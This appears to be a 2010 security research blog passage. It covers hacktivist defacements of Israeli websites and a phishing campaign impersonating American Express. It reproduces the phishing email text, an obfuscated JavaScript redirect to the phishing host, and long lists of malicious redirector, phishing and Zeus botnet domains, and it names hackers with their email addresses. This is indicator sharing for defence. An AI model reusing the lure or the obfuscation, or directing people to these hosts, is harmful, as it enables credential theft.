1923Turk is an homage to "the Ataturk", Mustafa Kemal. Although he is credited with ruling the first secular Turkey, beginning after World War I, the Ataturk is celebrated by these young hackers for his ability to have multiple religions living "at peace" with one another. They claim we need to return to this style of tolerance shown (at least in their twisted memories) by the Ataturk. (I actually read an enormous biography of the Ataturk to help me understand these guys - Ataturk: the Biography of the founder of Modern Turkey, by Andrew Mango - very helpful and interesting!)

Team Hitman Hacker


This team, consisting of Yemeni hacker Mr.NSR (oi3@hotmail.com) and Moroccan hacker, RaYm0n (n5b@hotmail.com) has posted a portrait of Hitler on various Israeli websites. The words on the Hitler poster are in Arabic, and I'm not sure yet what they say.

Team Hitman has defaced 8,700+ websites, including well over 100 Israeli sites in the past 48 hours.

Their current defacement technique is actually a redirect-injection that takes the visitor to RaYm0n's website:

http://raym0n.com/fuck-il.html

Raym0n's WHOIS data says his email is "w_@hotmail.fr"

He hosts his anti-Semitic content at "club4hosting.com"

BobyHikaru


Each new cyber protest acts as a recruiting event for new script kiddies. One of the new comers this time is BobyHikaru, who calls himself a member of the "Indonesian Hacker Team" and lists a website Devilzc0de.org on his defacements, along with this graphic:



In his spare time, Boby hacks the government of Indonesia. he's only hit less than 100 sites in his entire career.

Turkish Hacker, AKINCILAR, has also picked up this graphic, and added his own art to the bottom of it for use in defacements, such as this one:

http://yygranot.co.il/gallery

H4X0R-x0x


Another Indonesian hacker, with only 90 website defacements, has joined the cause, hacking a design school in Israel showing a metallic skeleton bursting through a bloody Israeli flag with his middle finger extended, and calling to "Stop War in Gaza"

Arumbia Team


The "Arumbia Team" (never heard of them) has also hacked an Israeli law firm and a half dozen other Israeli websites. They list 18 members, probably mostly Indonesian.

In Conclusion


No conclusion yet. This thing is just getting started. This morning's news had several references to synagogue websites in other parts of the world being defaced, most notably in Massachusetts by "Pintu Maya Team", although this seems to be a case of a very widely spread story originating from a single report. I can't find an archive of the actual defacement, and have never heard of Pinta Maya Team. If anyone knows a forum or website where they hang out, let me know . . . gar at uab dot edu

Wednesday, June 02, 2010

American Express Phish -- free webhosting abuse

For the past three days the most vigorously spammed phishing site in the UAB Spam Data Mine was for American Express.

Here's a sample of the spam message . . .

Dear American Express customer,

A newly revised American Express Online Form has been issued by the American Express Customer Care Team. Please complete this form as soon as possible. You can access the form at:

American Express Online Form.

Thank you for choosing American Express.

Sincerely,
American Express




Notice that it actually links to the REAL American Express website with its "phishing warning":

"To learn more about e-mail security or report a suspicious e-mail, visit us at americanexpress.com/phishing."

which really does go here:




The spam works in three ways.

(1) Direct URL advertisement, where the web address of the phishing site is given in the spam.

(2) URL shortening services, where a shorting service URL is given in the spam, which is expanded to the actual URL when visited.

(3) Free webhosting redirectors, where the criminals have established a free webhosting account and loaded the account with a URL that forwards to the actual phishing site.


URL shortening services:

The main services abused this time around, beginning on May 30th, were:

is.gd
u.nu
migre.me
doiop.com
qurl.com

In these cases, URLs were redirecting primarily to "www212.americanexpress.com.dll.kz" from shortened URLs such as:

is.gd/cvRXW
is.gd/cvSBB

qurl.com/9hlyn
qurl.com/rlrjw

migre.me/Kffa
migre.me/KffH

doiop.com/255bsb
doiop.com/76a7jv

u.nu/4eu2b

In the case of the Free Webhosting service, one important clue kept emerging. This same scam technique was seen March 31st and April 1st, using the same free webhosting services!

Some of the abused services include:

100freemb.com
100megsfree5.com
1accesshost.com
angelcities.com
arcadepages.com
bigheadhosting.net
builtfree.org
digitalzones.com
dreamstation.com
easyfreehosting.com
envy.nu
exactpages.com
fcpages.com
freecities.com
freehostyou.com
freewaywebhost.com
greatnow.com
ibnsites.com
lookseekpages.com
maddsites.com
o-f.com
s-enterprize.com
servetown.com
the-best-free-web-hosting.com
uvoweb.net
wtcsites.com

As one example of how the web refresh works, here is a javascript snippet that followed a "Meta http-equiv Refresh" portion for a FreeWayWebHost.com site:

(script language="javascript")location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'+'www212'+'\u002e\u0061\u006d\u0065'+'rican'+unescape('%65%78%70%72')+'\u0065\u0073\u0073\u002e\u0063\u006f\u006d'+unescape('%2e%64%6c%6c%2e%6b%7a')+'/my'+'\u0064\u0061\u0074\u0061\u002f'+'\u0066\u006f\u0072\u006d\u002f\u0061\u0070'+'\u0069\u0073\u0072'+unescape('%76%2e%70%68%70%3f%73')+'essio'+'\u006e\u003d\u0033\u0035\u0037\u0035\u0031'+'\u0032\u0032\u0032\u0032\u0033\u0036\u0036'+unescape('%39%36%30%30%31%32')+'\u0033\u0035\u0035\u0032\u0039\u0034\u0038'+'8319646'+'\u0030\u0031\u0038\u0032\u0034\u0036\u0033'+'5388'+'327'+'86548'+'\u0036\u0033\u0031'+'\u0039\u0037\u0037\u0035'+'637'+'973'+unescape('%33%33%37%37%37%32')+'667'+unescape('%32%34')+''(/script)

The Javascript was a "belt and suspenders" approach, since the site already had a Meta Refresh pointed to "www212.americanexpress.com.dll.kz/mydata/form/apisrv.php"

Here are some examples, showing the seemingly random hostnames and paths used in the spam messages:

2010-06-01 | http://agehoquv.ibnsites.com/adaryso.html
2010-06-01 | http://jiholyrufo.ibnsites.com/tefygij.html
2010-06-01 | http://ocydegube.ibnsites.com/qymory.html
2010-06-01 | http://gohydawiv.ibnsites.com/udycobew.html
2010-06-01 | http://foryqyfob.ibnsites.com/owupoves.html
2010-06-01 | http://obojidizy.ibnsites.com/usymix.html
2010-06-01 | http://putepotar.ibnsites.com/erocure.html
2010-06-01 | http://ehyhuwyc.ibnsites.com/wunawaso.html
2010-05-31 | http://evemyjopu.ibnsites.com/idibiheg.html
2010-05-31 | http://epilysora.ibnsites.com/fyqugo.html



MANY more examples follow at the end of this posting. We've now received more than 7,000 copies, all of those in group (2) and group (3) have a unique URL. No repeats.

To further the confusion of this phishing campaign, the ultimate destinations:

www212.americanexpress.com.dll.kz
and
www212.americanexpress.com.idlls.ru

were actually hosted on a broad network of "fast flux" domains. In Fast Flux hosting, the nameserver settings for each domain are constantly updated so that the resolving IP is always unique. The particular Fast Flux botnet that these were using is typically known as the "Zeus Fast Flux Botnet". Some of the Zeus domains that it is currently resolving are:

cribrejist.kz
cyansmith.com
esvr1.ru
esvr2.com
esvr3.ru
esvr4.net
hazelpay.ru
hesneclimi.ru
ielaithereej.com
jodnkism.com
mafisiengo.ru
nyfrizymiq.net
nyfrizymiq.net
ophaeghaev.ru
sslillisilsltlis.com
toothou.com
wrefraquaf.tw
zeferesds.com

But it also gets involved in other malware hosting. The controller of this botnet clearly "leases" usage of the botnet for other malware, so we see it currently also associated with:

goldencaravela.net <= meredrop site
flashplyaer.info
updateservice-server.net
www.stvpar.info


Here are some more examples of those American Express URLs I promised up above:


2010-05-31 | http://moconawe.ibnsites.com/sitinexa.html
2010-05-31 | http://huxivufu.ibnsites.com/imejuqa.html
2010-05-31 | http://yzyxurilub.ibnsites.com/sipavyl.html
2010-05-31 | http://xaxirynaco.ibnsites.com/elyqityd.html
2010-05-31 | http://sybodupota.ibnsites.com/lukybaqu.html
2010-05-31 | http://ihakimiti.ibnsites.com/yhijywi.html
2010-05-31 | http://qypagazok.ibnsites.com/anikyz.html
2010-05-31 | http://owebyfyj.ibnsites.com/bykigel.html
2010-05-31 | http://zatunezoz.ibnsites.com/zojuwevy.html
2010-05-31 | http://xidesanuqy.ibnsites.com/hofypep.html
2010-05-31 | http://gabyzenywu.ibnsites.com/nywavak.html
2010-05-31 | http://ybadilovi.ibnsites.com/tikysy.html
2010-05-31 | http://ifirogar.ibnsites.com/yhapabuw.html
2010-05-31 | http://zalimohob.ibnsites.com/ilopoweh.html
2010-05-31 | http://wujahuduf.ibnsites.com/ipehodoq.html
2010-05-31 | http://robobexef.ibnsites.com/owiwud.html
2010-05-31 | http://siwesysud.ibnsites.com/ylikal.html
2010-05-31 | http://hypohety.ibnsites.com/ycyloqu.html
2010-05-31 | http://efanogih.ibnsites.com/kytowym.html
2010-05-31 | http://sybujare.ibnsites.com/izutag.html
2010-05-31 | http://cedaxopuva.ibnsites.com/adysid.html
2010-05-31 | http://uhynanygi.ibnsites.com/igumih.html
2010-05-31 | http://eqacanipu.ibnsites.com/tuwynux.html
2010-05-30 | http://ytetemehyn.ibnsites.com/ikebabyc.html
2010-05-30 | http://podysinyj.ibnsites.com/bogate.html
2010-05-30 | http://nepozogewa.ibnsites.com/opycapy.html
2010-05-30 | http://bihocibyti.ibnsites.com/vaxagan.html
2010-05-30 | http://ofadusep.ibnsites.com/isycatol.html
2010-05-30 | http://imorazusi.ibnsites.com/zosapyn.html
2010-05-30 | http://capimalupa.ibnsites.com/jereleru.html
2010-05-30 | http://qanyquryf.ibnsites.com/ezydaq.html
2010-05-30 | http://asecemub.ibnsites.com/azezejuv.html
2010-05-30 | http://azyrywid.ibnsites.com/usorunoh.html
2010-05-30 | http://uxoxojoq.ibnsites.com/okefecoc.html
2010-05-30 | http://enefawoz.ibnsites.com/xoragi.html
2010-05-30 | http://mimocucaq.ibnsites.com/yvorewum.html
2010-05-30 | http://panoxilor.ibnsites.com/verufoh.html
2010-05-30 | http://ydezovamiz.ibnsites.com/oqetowi.html
2010-05-30 | http://barakuha.ibnsites.com/xovehizi.html
2010-05-30 | http://padazurafu.ibnsites.com/atutacix.html
2010-05-30 | http://pavomibiwe.ibnsites.com/araxeg.html
2010-05-30 | http://alynataz.ibnsites.com/qydurig.html
2010-05-30 | http://cokuzigis.ibnsites.com/utatape.html
2010-05-30 | http://susorahi.ibnsites.com/ovahacy.html
2010-05-30 | http://ymybygamoq.ibnsites.com/ymirybam.html
2010-05-30 | http://evilapys.ibnsites.com/emalone.html
2010-05-30 | http://ylegodyhyc.ibnsites.com/xacebe.html
2010-05-30 | http://cicemogof.ibnsites.com/fidizixo.html
2010-05-30 | http://tevetyjy.ibnsites.com/utiquvaj.html
2010-05-30 | http://dyvitahase.ibnsites.com/gasutyr.html
2010-05-30 | http://hiwaveboku.ibnsites.com/fupypuv.html
2010-05-30 | http://odywotyhe.ibnsites.com/exuluny.html
2010-05-30 | http://imuvuganec.ibnsites.com/vypolad.html
2010-05-30 | http://ugufihony.ibnsites.com/ibopej.html
2010-05-30 | http://timacovup.ibnsites.com/dejudyb.html
2010-05-30 | http://norurizer.ibnsites.com/ygatywaw.html
2010-05-30 | http://ujomexaxu.ibnsites.com/zimuvib.html
2010-05-30 | http://jiluweso.ibnsites.com/kycodepy.html
2010-05-30 | http://emafucagi.ibnsites.com/bevixy.html
2010-05-30 | http://poroqitob.ibnsites.com/wekawi.html

2010-06-01 | http://inalymikah.o-f.com/toguriwo.html
2010-06-01 | http://tiqafexy.o-f.com/pyhopiq.html
2010-06-01 | http://dagexedene.o-f.com/upixel.html
2010-06-01 | http://cyhysanopi.o-f.com/qolyqage.html
2010-05-31 | http://etiqoragu.o-f.com/efysaje.html
2010-05-31 | http://guvufuza.o-f.com/cedonit.html
2010-05-31 | http://buhazoneca.o-f.com/owuwukup.html
2010-05-31 | http://gyguhulaq.o-f.com/icavyfec.html
2010-05-31 | http://ebizonyfu.o-f.com/rawyteha.html
2010-05-31 | http://ebylegorij.o-f.com/nakovete.html
2010-05-31 | http://jarelyjuv.o-f.com/dylawyfi.html
2010-05-31 | http://operyzisi.o-f.com/opisuta.html
2010-05-30 | http://baguxoxo.o-f.com/wuqyqi.html
2010-05-30 | http://oqybekozu.o-f.com/aveduni.html
2010-05-30 | http://riqifarag.o-f.com/xumamu.html
2010-05-30 | http://akykypugaq.o-f.com/isofotis.html
2010-05-30 | http://qinofovutu.o-f.com/inykijuz.html
2010-05-30 | http://pizalire.o-f.com/bopove.html
2010-05-30 | http://acoruruw.o-f.com/fykagi.html
2010-05-30 | http://cagacaky.o-f.com/vumyxuxe.html
2010-05-30 | http://pomuvigome.o-f.com/unacece.html
2010-05-30 | http://cokylacali.o-f.com/axejit.html
2010-05-30 | http://zabikorel.o-f.com/aqivyke.html
2010-05-30 | http://vumizyfy.o-f.com/watejeh.html
2010-05-30 | http://erocemiry.o-f.com/ubelekol.html
2010-05-30 | http://kymecoxefo.o-f.com/osulafex.html
2010-05-30 | http://ydidisina.o-f.com/ixysyna.html
2010-05-30 | http://ynikonasix.o-f.com/adasejir.html
2010-05-30 | http://epohodux.o-f.com/iwixyvop.html
2010-05-30 | http://wefakicy.o-f.com/ibaxaxy.html
2010-05-30 | http://xoverewe.o-f.com/dawumy.html
2010-05-30 | http://ywyzobat.o-f.com/cotiqu.html
2010-05-30 | http://mixisavyp.o-f.com/usoxavox.html

2010-06-01 | http://faxubaqove.100megsfree5.com/xuvorax.html
2010-06-01 | http://gepuryqe.100megsfree5.com/hynuwy.html
2010-05-31 | http://yzykibyfuz.100megsfree5.com/fylibefe.html
2010-05-31 | http://bujydixy.100megsfree5.com/ikizopo.html
2010-05-31 | http://kivyfotyp.100megsfree5.com/irypun.html
2010-05-31 | http://yduxubyqed.100megsfree5.com/eryfewi.html
2010-05-31 | http://xidydemov.100megsfree5.com/wahijaby.html
2010-05-31 | http://iseryhezu.100megsfree5.com/vevawujo.html
2010-05-31 | http://ilyxyzyzo.100megsfree5.com/sagogo.html
2010-05-31 | http://ilebyjiqu.100megsfree5.com/afebape.html
2010-05-30 | http://gyrirylamu.100megsfree5.com/ejedylip.html
2010-05-30 | http://ytiqojyby.100megsfree5.com/uriqyw.html
2010-05-30 | http://hehaputag.100megsfree5.com/adebalo.html
2010-05-30 | http://laxaxuhuhe.100megsfree5.com/idygik.html
2010-05-30 | http://ulyfavef.100megsfree5.com/tihufe.html
2010-05-30 | http://eruzovunar.100megsfree5.com/sopyboj.html
2010-05-30 | http://vafezydufo.100megsfree5.com/xiqotex.html
2010-05-30 | http://ijakyloli.100megsfree5.com/piwuqa.html
2010-05-30 | http://ogucozexy.100megsfree5.com/bubomor.html
2010-05-30 | http://hysybifiwy.100megsfree5.com/cogogeh.html
2010-05-30 | http://ogeqaxelyc.100megsfree5.com/jufoja.html
2010-05-30 | http://irotubebax.100megsfree5.com/ezynona.html
2010-05-30 | http://utifimuwan.100megsfree5.com/ocyvobeg.html

2010-06-01 | http://yvoxysojet.digitalzones.com/qyxetore.html
2010-06-01 | http://yqurehybe.digitalzones.com/ugedobuv.html
2010-06-01 | http://kyfesimig.digitalzones.com/zezuky.html
2010-05-31 | http://aharohizaz.digitalzones.com/lijatu.html
2010-05-31 | http://epolecyk.digitalzones.com/uwyfaru.html
2010-05-31 | http://ukikewiw.digitalzones.com/fygoweni.html
2010-05-31 | http://icyvoqaqyd.digitalzones.com/ridoqemy.html
2010-05-31 | http://apagesymer.digitalzones.com/oxupus.html
2010-05-31 | http://ruhalake.digitalzones.com/sefyti.html
2010-05-31 | http://ojosycika.digitalzones.com/aditun.html
2010-05-31 | http://ybabitexys.digitalzones.com/ifutizo.html
2010-05-31 | http://amubekawy.digitalzones.com/ojywyg.html
2010-05-31 | http://habatowic.digitalzones.com/tiwemabu.html
2010-05-31 | http://oqomadef.digitalzones.com/nilyde.html
2010-05-31 | http://ejixoryhe.digitalzones.com/meximyji.html
2010-05-31 | http://qufivurug.digitalzones.com/idebexiw.html
2010-05-31 | http://iworabozux.digitalzones.com/regugemu.html
2010-05-31 | http://ygerurud.digitalzones.com/hicydag.html
2010-05-30 | http://ewutogymew.digitalzones.com/icakasy.html
2010-05-30 | http://icecymoxi.digitalzones.com/yfylur.html
2010-05-30 | http://uboboqyder.digitalzones.com/feqova.html
2010-05-30 | http://ryfybebih.digitalzones.com/anowaqy.html
2010-05-30 | http://iboxacumyf.digitalzones.com/timemiqi.html
2010-05-30 | http://osedomub.digitalzones.com/zibonaz.html
2010-05-30 | http://gatexocu.digitalzones.com/gyjaliha.html
2010-05-30 | http://iwilyguv.digitalzones.com/dagugo.html
2010-05-30 | http://juduparep.digitalzones.com/foraga.html
2010-05-30 | http://narewezybu.digitalzones.com/ozofuto.html
2010-05-30 | http://jyfoxaco.digitalzones.com/wacoguhu.html
2010-05-30 | http://iwesadod.digitalzones.com/ewasyjib.html
2010-05-30 | http://yryzypor.digitalzones.com/nulodusu.html
2010-05-30 | http://pimadajim.digitalzones.com/wekaqysa.html
2010-05-30 | http://uhuwuqok.digitalzones.com/iqegefat.html
2010-05-30 | http://ewygabolo.digitalzones.com/kamacami.html
2010-05-30 | http://izuqaxiw.digitalzones.com/voqejaj.html
2010-05-30 | http://ydodacuvi.digitalzones.com/muzykuw.html
2010-05-30 | http://ihapezezy.digitalzones.com/onatez.html
2010-05-30 | http://dilajatyx.digitalzones.com/halulewa.html
2010-05-30 | http://unyfucug.digitalzones.com/udarison.html
2010-05-30 | http://ujajapag.digitalzones.com/nahyha.html
2010-05-30 | http://yquqedum.digitalzones.com/ywijuba.html
2010-05-30 | http://lyqujosy.digitalzones.com/nehawa.html
2010-05-30 | http://kulivewag.digitalzones.com/jemunena.html
2010-05-30 | http://cakamize.digitalzones.com/faxovok.html
2010-05-30 | http://hykiwyroq.digitalzones.com/fesenir.html
2010-05-30 | http://ruvuvolaj.digitalzones.com/solewan.html
2010-05-30 | http://ygiwired.digitalzones.com/igejadup.html
2010-05-30 | http://dasoreco.digitalzones.com/efaqur.html


2010-06-01 | http://ezedicez.dreamstation.com/oroxogas.html
2010-06-01 | http://nisezyfidu.dreamstation.com/fumisocu.html
2010-06-01 | http://oginisukeb.dreamstation.com/fifeju.html
2010-05-31 | http://hoxejibe.dreamstation.com/eliwyq.html
2010-05-31 | http://xedymuwut.dreamstation.com/uwezyfor.html
2010-05-31 | http://gedutumuxo.dreamstation.com/amofone.html
2010-05-31 | http://vadymamicu.dreamstation.com/aquxepor.html
2010-05-31 | http://ajenifosi.dreamstation.com/ohuryja.html
2010-05-31 | http://dedycyquv.dreamstation.com/guruke.html
2010-05-31 | http://inowovin.dreamstation.com/onisog.html
2010-05-31 | http://adulybew.dreamstation.com/ixatyky.html
2010-05-31 | http://zimuxofohu.dreamstation.com/ryvana.html
2010-05-31 | http://ohuvaxeqes.dreamstation.com/odepid.html
2010-05-31 | http://tasuxaqor.dreamstation.com/teberop.html
2010-05-31 | http://ewekemimi.dreamstation.com/tonipu.html
2010-05-31 | http://wehatynek.dreamstation.com/nagifufe.html
2010-05-31 | http://unihejicuj.dreamstation.com/iwalivo.html
2010-05-31 | http://hodirynur.dreamstation.com/useces.html
2010-05-31 | http://ifybugosaf.dreamstation.com/emymijud.html
2010-05-31 | http://yxaderowow.dreamstation.com/uhunym.html
2010-05-30 | http://runadawi.dreamstation.com/exofat.html
2010-05-30 | http://ujafures.dreamstation.com/ledesut.html
2010-05-30 | http://guvevypewa.dreamstation.com/zuqycew.html
2010-05-30 | http://wewynuqy.dreamstation.com/visuzo.html
2010-05-30 | http://lecisofipa.dreamstation.com/odoqala.html
2010-05-30 | http://mavoneku.dreamstation.com/oqunexa.html
2010-05-30 | http://izodowigyb.dreamstation.com/olityl.html
2010-05-30 | http://hajabagiv.dreamstation.com/eqasyl.html
2010-05-30 | http://arubivotym.dreamstation.com/lahyqyba.html
2010-05-30 | http://esyvobil.dreamstation.com/ajajogab.html
2010-05-30 | http://ojiweweza.dreamstation.com/xylehih.html
2010-05-30 | http://guhyvune.dreamstation.com/kumusir.html
2010-05-30 | http://ujadanehy.dreamstation.com/hixohol.html
2010-05-30 | http://atyvapot.dreamstation.com/rolaza.html
2010-05-30 | http://lujyzeqah.dreamstation.com/vigusit.html
2010-05-30 | http://avuzefofej.dreamstation.com/ebukodu.html
2010-05-30 | http://cawupohef.dreamstation.com/zyxudogo.html
2010-05-30 | http://bubogyqit.dreamstation.com/ycenubif.html
2010-05-30 | http://isaridyci.dreamstation.com/agareq.html
2010-05-30 | http://guzakiwypi.dreamstation.com/zyfenowa.html


2010-06-02 | http://xecoferiku.lookseekpages.com/mafubula.html
2010-06-02 | http://ypaxypine.lookseekpages.com/vaweji.html
2010-06-01 | http://agidexepaz.lookseekpages.com/kakozi.html
2010-05-31 | http://harimiqu.lookseekpages.com/bugozef.html
2010-05-31 | http://lytapawuqo.lookseekpages.com/duqabewe.html
2010-05-31 | http://honanydatu.lookseekpages.com/lidice.html
2010-05-31 | http://iwowowiv.lookseekpages.com/ejahis.html
2010-05-31 | http://jytyboxo.lookseekpages.com/nyfyvit.html
2010-05-31 | http://xehirowip.lookseekpages.com/rubuji.html
2010-05-31 | http://mupehogo.lookseekpages.com/milogav.html
2010-05-31 | http://gulasezof.lookseekpages.com/velikim.html
2010-05-31 | http://ecofironof.lookseekpages.com/kapuli.html
2010-05-31 | http://agenyryva.lookseekpages.com/uzazucec.html
2010-05-31 | http://enoxovemyf.lookseekpages.com/ekeheda.html
2010-05-31 | http://xokyvezi.lookseekpages.com/enepyz.html
2010-05-31 | http://dikonutyj.lookseekpages.com/ybabyhik.html
2010-05-31 | http://utyhiduf.lookseekpages.com/buwiwo.html
2010-05-31 | http://zesunosyqe.lookseekpages.com/yfakigor.html
2010-05-31 | http://dolapefi.lookseekpages.com/nizabap.html
2010-05-31 | http://zaponixafy.lookseekpages.com/omililuh.html
2010-05-31 | http://gykohipuh.lookseekpages.com/ocahevah.html
2010-05-31 | http://ajoqenome.lookseekpages.com/acosyvu.html
2010-05-30 | http://qidihazit.lookseekpages.com/ylucyza.html
2010-05-30 | http://tegudydo.lookseekpages.com/icirunu.html
2010-05-30 | http://ecumoqumiz.lookseekpages.com/uwulywos.html
2010-05-30 | http://ikahycojaf.lookseekpages.com/juliga.html
2010-05-30 | http://yradyrelyq.lookseekpages.com/oxuvif.html
2010-05-30 | http://xegojuqyr.lookseekpages.com/kizazut.html
2010-05-30 | http://bamycyrila.lookseekpages.com/lagapaqe.html
2010-05-30 | http://jejupibiq.lookseekpages.com/pyfotu.html
2010-05-30 | http://uqoninop.lookseekpages.com/zacenuro.html
2010-05-30 | http://avyxixemy.lookseekpages.com/riqohap.html
2010-05-30 | http://xucurizog.lookseekpages.com/nalafew.html
2010-05-30 | http://gepavexuw.lookseekpages.com/olamos.html
2010-05-30 | http://ucovewyvu.lookseekpages.com/ysixyxo.html
2010-05-30 | http://pisocojo.lookseekpages.com/zufutok.html
2010-05-30 | http://umufypaw.lookseekpages.com/isinako.html
2010-05-30 | http://uroregyki.lookseekpages.com/vagasuq.html
2010-05-30 | http://nifepuzov.lookseekpages.com/ufuwocyj.html
2010-05-30 | http://barejeny.lookseekpages.com/bosexyz.html
2010-05-30 | http://yvikepody.lookseekpages.com/ufyjegu.html
2010-05-30 | http://zejutibaji.lookseekpages.com/ubozety.html
2010-05-30 | http://mydypupe.lookseekpages.com/hinyrily.html
2010-05-30 | http://avazetoz.lookseekpages.com/dyvega.html
2010-05-30 | http://ekakacefus.lookseekpages.com/uhyjikop.html
2010-05-30 | http://ekixyzov.lookseekpages.com/roqagyk.html
2010-05-30 | http://ohymajat.lookseekpages.com/ogaladej.html
2010-05-30 | http://erubelip.lookseekpages.com/makujas.html
2010-05-30 | http://ronyzubef.lookseekpages.com/pipimi.html
2010-05-30 | http://ynuganaz.lookseekpages.com/okinelud.html
2010-05-30 | http://qigodygob.lookseekpages.com/tydoxovi.html
2010-05-30 | http://etabeduhy.lookseekpages.com/rokyjab.html
2010-05-30 | http://kyjexise.lookseekpages.com/mugimo.html
2010-05-30 | http://ikivypavog.lookseekpages.com/hytosyru.html
2010-05-30 | http://kejoximybi.lookseekpages.com/ciniti.html
2010-05-30 | http://cafubycex.lookseekpages.com/osovobyx.html

2010-06-02 | http://ytimuqamo.arcadepages.com/zakyqy.html
2010-06-02 | http://bovetore.arcadepages.com/gizaxyz.html
2010-06-01 | http://betarojyjo.arcadepages.com/conotuxi.html
2010-05-31 | http://icebamewop.arcadepages.com/udemek.html
2010-05-31 | http://mirovonovy.arcadepages.com/ezuwuzo.html
2010-05-31 | http://olavysyxa.arcadepages.com/uvupapam.html
2010-05-31 | http://udawupyde.arcadepages.com/iqanyk.html
2010-05-31 | http://zirodyvimy.arcadepages.com/yfebimyf.html
2010-05-31 | http://gifitepe.arcadepages.com/ulukatim.html
2010-05-31 | http://migyqivit.arcadepages.com/arekaxu.html
2010-05-31 | http://iquvekok.arcadepages.com/vomawob.html
2010-05-31 | http://wavofydym.arcadepages.com/rudydu.html
2010-05-31 | http://mulawymub.arcadepages.com/biwyky.html
2010-05-31 | http://wemowofose.arcadepages.com/ficapon.html
2010-05-31 | http://ybetyqulyp.arcadepages.com/esahyvy.html
2010-05-31 | http://izijytygom.arcadepages.com/unazev.html
2010-05-30 | http://zybymypi.arcadepages.com/ibedag.html
2010-05-30 | http://zekajamef.arcadepages.com/ojuman.html
2010-05-30 | http://ucobiboqo.arcadepages.com/inunen.html
2010-05-30 | http://adebifag.arcadepages.com/udumeqo.html
2010-05-30 | http://jyzabifyqe.arcadepages.com/jacavis.html
2010-05-30 | http://qenojoty.arcadepages.com/azicyp.html
2010-05-30 | http://gezarytyx.arcadepages.com/fabimam.html
2010-05-30 | http://novaqadu.arcadepages.com/obikofo.html
2010-05-30 | http://ifadoric.arcadepages.com/nebohy.html
2010-05-30 | http://jugekevaba.arcadepages.com/irenyru.html
2010-05-30 | http://kugozaxeb.arcadepages.com/lebivofi.html
2010-05-30 | http://nolopyno.arcadepages.com/ubemyw.html
2010-05-30 | http://dalogiha.arcadepages.com/ohuvysud.html
2010-05-30 | http://foqegepy.arcadepages.com/cegasa.html